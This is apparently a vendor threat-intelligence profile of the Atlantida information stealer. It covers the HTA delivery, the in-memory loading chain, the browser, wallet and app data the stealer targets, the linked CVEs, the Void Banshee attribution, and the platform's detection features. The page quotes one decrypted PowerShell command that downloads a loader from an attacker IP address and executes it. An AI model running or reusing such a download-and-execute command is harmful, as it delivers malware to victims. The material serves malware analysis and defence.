Atlantida is a Windows information-stealing malware family first observed in 2024 and associated with financially motivated activity, including campaigns linked to the threat actor Void Banshee. It is designed to harvest a broad set of victim data, with emphasis on browser-stored credentials and session material, cryptocurrency wallet data, and other locally stored information of monetary or operational value.
Atlantida has been delivered through socially engineered execution chains in which a victim downloads and manually launches a malicious HTA file from a compromised website. Reported intrusion chains use script-based staging and in-memory loading, including VBScript and PowerShell, followed by a .NET downloader, shellcode execution, reflective loading, and remote thread injection into a legitimate Windows process to load the final payload without writing all stages to disk. This execution model indicates a strong focus on defense evasion and post-compromise stealth.
Once active, Atlantida targets data from major browsers including Chrome, Firefox, and Edge. It steals stored passwords, cookies, authentication tokens, payment-card data, and autofill information, and also enumerates Chrome-based browser extensions associated with cryptocurrency wallets. Beyond browsers, it has been reported to collect data from applications and stores such as Telegram, Steam, FileZilla, Binance-related local data, desktop text files, and offline cryptocurrency wallets. It also captures screenshots and gathers host profiling information such as CPU, GPU, RAM, and display characteristics before compressing and exfiltrating the collected data to attacker-controlled infrastructure.
Atlantida has been observed as the final payload in exploit chains involving Microsoft Windows vulnerabilities, including campaigns attributed to Void Banshee that used MSHTML-related flaws for delivery. Reported targeting spans North America, Europe, and Southeast Asia, with objectives centered on information theft and financial gain. Its combination of browser theft, wallet targeting, in-memory execution, and process injection places it among modern commodity and actor-operated stealers focused on credential access, session hijacking, and cryptocurrency theft.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"The final payload of this zero-day attack chain is the Atlantida stealer, which was first discovered in January 2024."
...exploited by the threat actor to deliver Atlantida stealer malware.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"The final payload of this zero-day attack chain is the Atlantida stealer, which was first discovered in January 2024."
11 distinct techniques documented for this family, organized by ATT&CK tactic.
The decrypted command : “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex“ .
13 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Listed as a malware/tool name in a collection of SHA-256 hashes intended to help identify C2 infrastructure, open directories, and phishing assets.
Information-stealing malware that exfiltrates passwords, authentication cookies, and cryptocurrency wallets.
Information-stealing malware (“stealer”) delivered via exploitation of MSHTML spoofing vulnerabilities (notably in an attack chain involving CVE-2024-38112 / CVE-2024-43461 as described).
A newly observed information stealer delivered via a malicious HTA and multi-stage in-memory loading chain. It steals browser credentials and data, Telegram data, Steam and FileZilla data, Binance files, offline cryptocurrency wallet data, text files from the Desktop, hardware information, screenshots, and data from numerous crypto wallet browser extensions before compressing and exfiltrating the collected data to a hard-coded C2 server.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.